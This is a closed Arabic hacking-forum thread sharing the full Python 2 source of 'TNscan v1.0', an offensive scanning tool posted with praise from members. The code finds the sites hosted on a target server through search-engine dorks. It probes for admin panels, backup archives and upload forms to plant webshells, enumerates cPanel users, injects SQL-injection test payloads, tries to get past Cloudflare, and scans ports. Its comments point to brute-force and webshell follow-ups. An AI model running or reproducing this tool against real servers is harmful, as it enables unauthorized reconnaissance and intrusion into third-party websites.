حالة الموضوع:
مغلق
  1. Mstr Yaser

    Mstr Yaser <span style="font-weight: bold; text-shadow: #BBBB موقوف لمخالفة الشروط

    الأنتساب:
    ‏21 نوفمبر 2014
    المشاركات:
    353
    الإعجابات المتلقاة:
    6
    نقاط الجائزة:
    18
    المخالفات
    1
    بسم الله الرحمن الرحيم والصلاه والسلام على اشرف الخلق والمرسلين سيدنا محمد وعلى ال بيته الطاهرين وصحبه اجمين

    اليوم حبيت اطرح سكربت فتاك مكتوب بلغة البايثون طبعا السكربت من برمجة الاخ ماتركس كودر :{7!}:
    طبعا السكربت الة خصائص كثيرة وقوية جدا :!."
    اترككم مع التحميل
    Good طھط­ظ…ظٹظ„ â—ڈ ظ…ط±ظƒط² طھط­ظ…ظٹظ„ ط§ظ„طµظˆط± ظˆط§ظ„ظ…ظ„ظپط§طھ
    في امان الله :ُ{ce}:ُ​
     
  2. Mokhalad HaXor

    Mokhalad HaXor آداريً شؤون الأعضًاء

    الأنتساب:
    ‏3 يوليو 2012
    المشاركات:
    3,319
    الإعجابات المتلقاة:
    2,463
    نقاط الجائزة:
    113
    الجنس:
    ذكر
    الوظيفة:
    Hacking
    الإقامة:
    etc/shadow
    رد: بايثون فتاك بالاستهداف

    بارك الله بيك , ننتضر منك شرح اوضح مصور صور توضيحة ل الاعضاء او فيديو بسيط + تنسيق اكثر بعد .. ب التوفيق {3$0}
     
  3. VeRoS_Dz

    VeRoS_Dz Developer

    الأنتساب:
    ‏10 أغسطس 2012
    المشاركات:
    37
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    8
    الوظيفة:
    VeRoS_Dz
    الإقامة:
    VeRoS_Dz
    رد: بايثون فتاك بالاستهداف

    يعطيك الف عافيه يا بطل
     
  4. Red-StOnE

    Red-StOnE Developer

    الأنتساب:
    ‏29 مايو 2012
    المشاركات:
    62
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    8
    رد: بايثون فتاك بالاستهداف

    مشكور يابطل [​IMG]

    السكربت لضمان بقائه

    [PHP CODE]#!/usr/bin/env python2# >>> Bism Allah <<<
    # Code Name : TNscan v1.0
    # Coder : MatriX Coder (17 yo guy from Tunisia)
    # Blog : www.matrixcoder.co.vu
    # Twitter : MatriX_Coder
    # Pastebin : www.pastebin.com/u/matrixcoder
    # this a developed version of al-swisre code (well i think it's even better) anyway greats to that man
    # Greats to : all Muslim (ethical and unethical) Hackers who are fighting for an issue
    # greats also to tunisia fallega team and to madleets team and to you !
    # Wroten with <3 in my arch machine using geany, a cup of tea and while listening to jazz


    import re, urllib2, urllib, os, socket, sys
    from platform import system
    logo = """
    \t _____ _ _
    \t|_ _| \ | |
    \t | | | \| |___ ___ __ _ _ __
    \t | | | . ` / __|/ __/ _` | '_ \
    \t | | | |\ \__ \ (_| (_| | | | |
    \t \_/ \_| \_/___/\___\__,_|_| |_| v1.0

    """


    menu = """
    1) Get all websites
    2) Get joomla websites
    3) Get wordpress websites
    4) Find control panel
    5) Find zip files
    6) Find upload files
    7) Get server users
    8) Scan from SQL injection
    9) Crawl and scan from SQL injection (soon)
    10) Scan ports (range of ports)
    11) Scan ports (common ports )
    12) Get server banner
    13) Bypass Cloudflare
    14) About !
    99) Exit
    """
    def unique(seq):
    """
    get unique from list found it on stackoverflow
    """
    seen = set()
    return [seen.add(x) or x for x in seq if x not in seen]

    def clearScr() :
    """
    clear the screen in case of GNU/Linux or
    windows
    """
    if system() == 'Linux':
    os.system('clear')
    if system() == 'Windows':
    os.system('cls')


    class TNscan :
    def __init__(self, serverip) :
    self.serverip = serverip
    self.getSites(False)
    print menu
    while True :
    choice = raw_input(' Enter choice -> ')
    if choice == '1' :
    self.getSites(True)
    elif choice == '2' :
    self.getJoomla()
    elif choice == '3' :
    self.getWordpress()
    elif choice == '4' :
    self.findPanels()
    elif choice == '5' :
    self.findZip()
    elif choice == '6' :
    self.findUp()
    elif choice == '7' :
    self.getUsers()
    elif choice == '8' :
    self.grabSqli()
    elif choice == '10' :
    ran = raw_input(' Enter range of ports, (ex : 1-1000) -> ')
    self.portScanner(1, ran)
    elif choice == '11' :
    self.portScanner(2, None)
    elif choice == '12' :
    self.getServerBanner()
    elif choice == '13' :
    self.cloudflareBypasser()
    elif choice == '14' :
    self.aboutME()
    elif choice == '99' :
    print ' Goodbye'
    exit()
    con = raw_input(' Continue [Y/n] -> ')
    if con[0].upper() == 'N' :
    exit()
    else :
    clearScr()
    print logo
    print menu

    def aboutME(self) :
    clearScr()
    print """
    >>> Bism Allah <<<
    Code Name : TNscan v1.0
    Coder : MatriX Coder (17 yo guy from Tunisia)
    Blog : www.matrixcoder.co.vu
    Twitter : MatriX_Coder
    Pastebin : www.pastebin.com/u/matrixcoder
    this a developed version of al-swisre code (well i think it's even better) anyway greats to that man
    Greats to : all Muslim (ethical and unethical) Hackers who are fighting for an issue
    greats also to tunisian fallega team, to madleets team and to you !
    Wroten with <3 in my arch machine using geany, a cup of tea and while listening to jazz
    """

    def getSites(self, a) :
    """
    get all websites on same server
    from bing search
    """
    lista = []
    page = 1
    while page <= 101:
    try:
    bing = "http://www.bing.com/search?q=ip%3A" + self.serverip + "+&count=50&first=" + str(page)
    openbing = urllib2.urlopen(bing)
    readbing = openbing.read()
    findwebs = re.findall('<h2><a href="(.*?)"', readbing)
    for i in range(len(findwebs)):
    allnoclean = findwebs
    findall1 = re.findall('http://(.*?)/', allnoclean)
    for idx, item in enumerate(findall1):
    if 'www' not in item:
    findall1[idx] = 'http://www.' + item + '/'
    else:
    findall1[idx] = 'http://' + item + '/'
    lista.extend(findall1)

    page += 50
    except urllib2.URLError:
    pass
    self.sites = unique(lista)
    if a :
    clearScr()
    print '
    [*] Found ', len(lista), ' Website\n'
    for site in self.sites :
    print site

    def getWordpress(self) :
    """
    get wordpress site using a dork the attacker
    may do a password list attack (i did a tool for that purpose check my pastebin)
    or scan for common vulnerabilities using wpscan for example (i did a simple tool
    for multi scanning using wpscan)
    """
    lista = []
    page = 1
    while page <= 101:
    try:
    bing = "http://www.bing.com/search?q=ip%3A" + self.serverip + "+?page_id=&count=50&first=" + str(page)
    openbing = urllib2.urlopen(bing)
    readbing = openbing.read()
    findwebs = re.findall('<h2><a href="(.*?)"', readbing)
    for i in range(len(findwebs)):
    wpnoclean = findwebs
    findwp = re.findall('(.*?)\?page_id=', wpnoclean)
    lista.extend(findwp)
    page += 50
    except:
    pass
    lista = unique(lista)
    clearScr()
    print '
    [*] Found ', len(lista), ' Wordpress Website\n'
    for site in lista :
    print site


    def getJoomla(self) :
    """
    get all joomla websites using
    bing search the attacker may bruteforce
    or scan them
    """
    lista = []
    page = 1
    while page <= 101:
    bing = "http://www.bing.com/search?q=ip%3A" + self.serverip + "+index.php?option=com&count=50&first=" + str(page)
    openbing = urllib2.urlopen(bing)
    readbing = openbing.read()
    findwebs = re.findall('<h2><a href="(.*?)"', readbing)
    for i in range(len(findwebs)):
    jmnoclean = findwebs
    findjm = re.findall('(.*?)index.php', jmnoclean)
    lista.extend(findjm)
    page += 50
    lista = unique(lista)
    clearScr()
    print '
    [*] Found ', len(lista), ' Joomla Website\n'
    for site in lista :
    print site



    def findPanels(self) :
    """
    find panels from grabbed websites
    the attacker may do a lot of vulnerabilty
    tests on the admin area
    """
    adminList = ['admin/', 'site/admin', 'admin.php/', 'up/admin/', 'central/admin/', 'whm/admin/', 'whmcs/admin/', 'support/admin/', 'upload/admin/', 'video/admin/', 'shop/admin/', 'shoping/admin/', 'wp-admin/', 'wp/wp-admin/', 'blog/wp-admin/', 'admincp/', 'admincp.php/', 'vb/admincp/', 'forum/admincp/', 'up/admincp/', 'administrator/', 'administrator.php/', 'joomla/administrator/', 'jm/administrator/', 'site/administrator/', 'install/', 'vb/install/', 'dimcp/', 'clientes/', 'admin_cp/', 'login/', 'login.php', 'site/login', 'site/login.php', 'up/login/', 'up/login.php', 'cp.php', 'up/cp', 'cp', 'master', 'adm', 'member', 'control', 'webmaster', 'myadmin', 'admin_cp', 'admin_site']
    clearScr()
    for site in self.sites :
    for admin in adminList :
    if urllib.urlopen(site + admin).getcode() == 200 :
    print "
    [*] Found admin panel -> ", site + admin

    def findZip(self) :
    """
    find zip files from grabbed websites
    it may contain useful informations
    """
    zipList = ['backup.tar.gz', 'backup/backup.tar.gz', 'backup/backup.zip', 'vb/backup.zip', 'site/backup.zip', 'backup.zip', 'backup.rar', 'backup.sql', 'vb/vb.zip', 'vb.zip', 'vb.sql', 'vb.rar', 'vb1.zip', 'vb2.zip', 'vbb.zip', 'vb3.zip', 'upload.zip', 'up/upload.zip', 'joomla.zip', 'joomla.rar', 'joomla.sql', 'wordpress.zip', 'wp/wordpress.zip', 'blog/wordpress.zip', 'wordpress.rar']
    clearScr()
    for site in self.sites :
    for zip1 in zipList :
    if urllib.urlopen(site + zip1).getcode() == 200 :
    print "
    [*] Found zip file -> ", site + zip1

    def findUp(self) :
    """
    find upload forms from grabbed
    websites the attacker may succeed to
    upload malicious files like webshells
    """
    upList = ['up.php', 'up1.php', 'up/up.php', 'site/up.php', 'vb/up.php', 'forum/up.php','blog/up.php', 'upload.php', 'upload1.php', 'upload2.php', 'vb/upload.php', 'forum/upload.php', 'blog/upload.php', 'site/upload.php', 'download.php']
    clearScr()
    for site in self.sites :
    for up in upList :
    if (urllib.urlopen(site + up).getcode() == 200) :
    html = urllib.urlopen(site + up).readlines()
    for line in html :
    if re.findall('type=file', line) :
    print "
    [*] Found upload -> ", site+up

    def getUsers(self) :
    """
    get server users using a method found by
    iranian hackers i think, the attacker may
    do a bruteforce attack on CPanel, ssh, ftp or
    even mysql if it supports remote login
    (you can use medusa or hydra)
    """
    userslist = []
    for site in self.sites :
    try:
    site = site.replace('http://www.', '')
    site = site.replace('http://', '')
    site = site.replace('.', '')
    if '-' in site:
    site = site.replace('-', '')
    site = site.replace('/', '')


    while len(site) > 2:
    resp = urllib2.urlopen(site + '/cgi-sys/guestbook.cgi?user=%s' % site).read()
    if 'invalid username' not in resp.lower():
    print '\t
    [*] Found -> ', site
    userslist.append(site)
    else :
    print site

    site = site[:-1]

    clearScr()
    for user in userlist :
    print user


    except:
    pass

    def cloudflareBypasser(self) :
    """
    trys to bypass cloudflare i already wrote
    in my blog how it works, i learned this
    method from a guy in madleets
    """
    clearScr()
    subdoms = ['mail', 'webmail', 'ftp', 'direct', 'cpanel']
    for site in self.sites :
    site.replace('http://', '')
    site.replace('/', '')
    try:
    ip = socket.gethostbyname(site)
    except socket.error:
    pass
    for sub in subdoms:
    doo = sub + '.' + site
    print ' [~] Trying -> ', doo
    try:
    ddd = socket.gethostbyname(doo)
    if ddd != ip:
    print '
    [*] Cloudflare bypassed -> ', ddd
    break
    except socket.error :
    pass

    def getServerBanner(self) :
    """
    simply gets the server banner
    the attacker may benefit from it
    like getting the server side software
    """
    clearScr()
    try:
    s = 'http://' + self.serverip
    httpresponse = urllib.urlopen(s)
    print '
    [*] Server header -> ', httpresponse.headers.getheader('server')
    except:
    pass

    def grabSqli(self) :
    """
    just grabs all websites in server with php?id= dork
    for scanning for error based sql injection
    """
    page = 1
    lista = []
    while page <= 101:
    try:
    bing = "http://www.bing.com/search?q=ip%3A" + self.serverip + "+php?id=&count=50&first=" + str(page)
    openbing = urllib2.urlopen(bing)
    readbing = openbing.read()
    findwebs = re.findall('<h2><a href="(.*?)"', readbing)
    for i in range(len(findwebs)):
    x = findwebs
    lista.append(x)
    except:
    pass
    page += 50
    lista = unique(lista)
    self.checkSqli(lista)

    def checkSqli(self, s):
    """
    checks for error based sql injection,
    most of the codes here are from webpwn3r
    project the one who has found an lfi in
    yahoo as i remember, you can find a separate
    tool in my blog
    """
    clearScr()
    payloads = ["3'", "3%5c", "3%27%22%28%29", "3'><", "3%22%5C%27%5C%22%29%3B%7C%5D%2A%7B%250d%250a%3C%2500%3E%25bf%2527%27"]
    check = re.compile("Incorrect syntax|mysql_fetch|Syntax error|Unclosed.+mark|unterminated.+qoute|SQL.+Server|Microsoft.+Database|Fatal.+error", re.I)
    for url in s:
    try:
    for param in url.split('?')[1].split('&'):
    for payload in payloads:
    power = url.replace(param, param + payload.strip())
    #print power
    html = urllib2.urlopen(power).readlines()
    for line in html:
    checker = re.findall(check, line)
    if len(checker) != 0 :
    print '
    [*] SQLi found -> ', power
    except:
    pass

    def crawlSqli(self) :
    """
    simple crawling using chilkat (yeah chilkat sucks)
    and scan for error based sql injection
    [!] will be on the next version
    """
    pass

    def portScanner(self, mode, ran) :
    """
    simple port scanner works with range of ports
    or with common ports (al-swisre idea)
    """
    clearScr()
    def do_it(ip, port):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    #sock.settimeout(5)
    sock = sock.connect_ex((ip,port))
    if sock == 0:
    print "
    [*] Port %i is open" % port

    if mode == 1 :
    a = ran.split('-')
    start = int(a[0])
    end = int(a[1])
    for i in range(start, end):
    do_it(self.serverip, i)
    elif mode == 2 :
    for port in [80,21,22,2082,25,53,110,443,143] :
    # didn't use multithreading cos it's few ports
    do_it(self.serverip, port)


    if __name__ == '__main__' :
    try :
    clearScr()
    print logo
    TNscan(sys.argv[1])
    except IndexError :
    print "
    [*] Usage : python "+sys.argv[0]+" 127.0.0.1"[/PHP CODE]
     
  5. Mstr Yaser

    Mstr Yaser <span style="font-weight: bold; text-shadow: #BBBB موقوف لمخالفة الشروط

    الأنتساب:
    ‏21 نوفمبر 2014
    المشاركات:
    353
    الإعجابات المتلقاة:
    6
    نقاط الجائزة:
    18
    المخالفات
    1
    رد: بايثون فتاك بالاستهداف

    اشكركم على المرور ^_^ وبمناسبة التنسيق اعذروني كنت مستعجل
     
  6. Legend_Killer

    Legend_Killer Developer

    الأنتساب:
    ‏6 ابريل 2012
    المشاركات:
    74
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:
    8
    الوظيفة:
    طَالب..~
    الإقامة:
    α.ι.є.х.α.η.ᴆ.я.ı̃̾.α
    رد: بايثون فتاك بالاستهداف

    شكرا لك
    يعطيك العافية
     
  7. MR.CAPTCHA

    MR.CAPTCHA Expert Developer ExpErt DeveloPer

    الأنتساب:
    ‏30 أغسطس 2014
    المشاركات:
    1,786
    الإعجابات المتلقاة:
    14
    نقاط الجائزة:
    38
    الوظيفة:
    I.T Student
    الإقامة:
    IRAQ
    رد: بايثون فتاك بالاستهداف

    بارك الله بك اخي
    طرح رائع
    [​IMG][​IMG]
     
  8. MatriX Coder

    MatriX Coder Developer

    الأنتساب:
    ‏5 أكتوبر 2014
    المشاركات:
    5
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    رد: بايثون فتاك بالاستهداف

    بارك الله فيك أخي على النشر .غرييبة أمر 100 مشاركة لكتابة موضوع .
     
  9. Mstr Yaser

    Mstr Yaser <span style="font-weight: bold; text-shadow: #BBBB موقوف لمخالفة الشروط

    الأنتساب:
    ‏21 نوفمبر 2014
    المشاركات:
    353
    الإعجابات المتلقاة:
    6
    نقاط الجائزة:
    18
    المخالفات
    1
    رد: بايثون فتاك بالاستهداف

    اشكركم على المرور احبائي .. ماتركس كودر ليس 100 مشاركة لكتابة موضوع بل يجب عليك ان تحصل على رتبة ديفلوبر هذا الي اعرفو انا بالتوفيق :)
     
  10. вαиɒєя

    вαиɒєя DeveloPer Plus

    الأنتساب:
    ‏17 ديسمبر 2011
    المشاركات:
    142
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    18
    الوظيفة:
    طآلب
    الإقامة:
    k.s.a
    رد: بايثون فتاك بالاستهداف

    يعطيك العآفيه أخوي على الطرح الرآئع ،
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة